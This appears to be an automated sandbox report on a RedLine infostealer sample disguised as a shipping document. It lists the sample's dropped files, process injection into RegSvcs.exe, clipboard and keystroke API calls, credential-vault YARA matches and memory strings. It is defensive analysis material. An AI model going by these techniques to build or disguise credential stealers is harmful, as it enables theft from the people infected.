Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DC6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_00DC6D07

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

0_2_006D6B0C

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006C2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_006C2B37

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006EF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_006EF7FF
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DDF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_00DDF7FF

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.juvenile.exe.3c30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.RegSvcs.exe.3fe6458.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.4033190.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.5560000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.2cbf09e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.5560ee8.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.2cbf09e.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.juvenile.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.3fe5570.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.juvenile.exe.3840000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.RegSvcs.exe.4033190.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.2cbff86.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.RegSvcs.exe.5560000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.3fe5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.juvenile.exe.2080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.RegSvcs.exe.2cbff86.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.56f0000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.RegSvcs.exe.3fe6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000007.00000002.2303120094.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000004.00000002.2202431029.0000000003840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000005.00000002.2322641026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.2175869516.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.2321963047.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00683D19
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe, 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dfabc592-e
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe, 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: kSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d82fe9f1-0
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe, 00000000.00000003.2155101697.00000000036DD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6f649583-9
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe, 00000000.00000003.2155101697.00000000036DD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_692c9dd8-2
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: This is a third-party compiled AutoIt script.	2_2_00D73D19
Source: juvenile.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: juvenile.exe, 00000002.00000002.2175750569.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_56674717-7
Source: juvenile.exe, 00000002.00000002.2175750569.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_5ab3fd78-5
Source: juvenile.exe, 00000004.00000000.2174988347.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d8ce1cf1-a
Source: juvenile.exe, 00000004.00000000.2174988347.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_17b70289-f
Source: juvenile.exe, 00000007.00000000.2278497964.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e1273130-7
Source: juvenile.exe, 00000007.00000000.2278497964.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_5b8b8653-3
Source: juvenile.exe, 00000009.00000000.2294737720.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8c26c196-7
Source: juvenile.exe, 00000009.00000000.2294737720.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_975049a0-a
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_20256902-1
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_20f96451-8
Source: juvenile.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_981e69f8-f
Source: juvenile.exe.0.dr	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_120b9de9-b

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006C6606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_006C6606

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_006BACC5

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_006C79D3
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DB79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_00DB79D3

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006AB043	0_2_006AB043
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_00693200	0_2_00693200
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_00693B70	0_2_00693B70
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006B410F	0_2_006B410F
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006A02A4	0_2_006A02A4
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_0068E3E3	0_2_0068E3E3
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006B038E	0_2_006B038E
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006B467F	0_2_006B467F
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006A06D9	0_2_006A06D9
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006EAACE	0_2_006EAACE
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006B4BEF	0_2_006B4BEF
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006ACCC1	0_2_006ACCC1
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_0068AF50	0_2_0068AF50
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_00686F07	0_2_00686F07
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_0069B11F	0_2_0069B11F
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006E31BC	0_2_006E31BC
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006AD1B9	0_2_006AD1B9
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006B724D	0_2_006B724D
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006A123A	0_2_006A123A
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006893F0	0_2_006893F0
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006C13CA	0_2_006C13CA
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_0069F563	0_2_0069F563
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006CB6CC	0_2_006CB6CC
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006896C0	0_2_006896C0
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006EF7FF	0_2_006EF7FF
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006877B0	0_2_006877B0
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006B79C9	0_2_006B79C9
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_0069FA57	0_2_0069FA57
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_00689B60	0_2_00689B60
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_00687D19	0_2_00687D19
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_0069FE6F	0_2_0069FE6F
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006A9ED0	0_2_006A9ED0
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_00687FA3	0_2_00687FA3
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_00F06DF8	0_2_00F06DF8
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D9B043	2_2_00D9B043
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D83200	2_2_00D83200
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D83B70	2_2_00D83B70
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DA410F	2_2_00DA410F
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D902A4	2_2_00D902A4
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DA038E	2_2_00DA038E
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D7E3B0	2_2_00D7E3B0
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D906D9	2_2_00D906D9
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DA467F	2_2_00DA467F
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DDAACE	2_2_00DDAACE
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DA4BEF	2_2_00DA4BEF
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D9CCC1	2_2_00D9CCC1
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D7AF50	2_2_00D7AF50
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D76F07	2_2_00D76F07
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D9D1B9	2_2_00D9D1B9
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DD31BC	2_2_00DD31BC
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D8B11F	2_2_00D8B11F
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DA724D	2_2_00DA724D
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D9123A	2_2_00D9123A
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DB13CA	2_2_00DB13CA
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D793F0	2_2_00D793F0
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D8F563	2_2_00D8F563
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D796C0	2_2_00D796C0
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DBB6CC	2_2_00DBB6CC
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DDF7FF	2_2_00DDF7FF
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D777B0	2_2_00D777B0
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DA79C9	2_2_00DA79C9
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D8FA57	2_2_00D8FA57
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D79B60	2_2_00D79B60
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D77D19	2_2_00D77D19
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D99ED0	2_2_00D99ED0
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D8FE6F	2_2_00D8FE6F
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D77FA3	2_2_00D77FA3
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_0121AC68	2_2_0121AC68
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 4_2_0110E500	4_2_0110E500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00408C60	5_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0040DC11	5_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00407C3F	5_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00418CCC	5_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00406CA0	5_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004028B0	5_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041A4BE	5_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00418244	5_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00401650	5_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402F20	5_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004193C4	5_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00418788	5_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402F89	5_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402B90	5_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004073A0	5_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_02B0D8E0	5_2_02B0D8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_02B0CCC8	5_2_02B0CCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_02B00EE0	5_2_02B00EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_02B01030	5_2_02B01030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_02B0D010	5_2_02B0D010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C565A1	5_2_05C565A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C5C5A8	5_2_05C5C5A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C55E18	5_2_05C55E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C59098	5_2_05C59098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C50040	5_2_05C50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C50006	5_2_05C50006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C5F3DB	5_2_05C5F3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06D04E30	5_2_06D04E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06D00040	5_2_06D00040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06D05DC8	5_2_06D05DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06D0A338	5_2_06D0A338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06D01138	5_2_06D01138

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
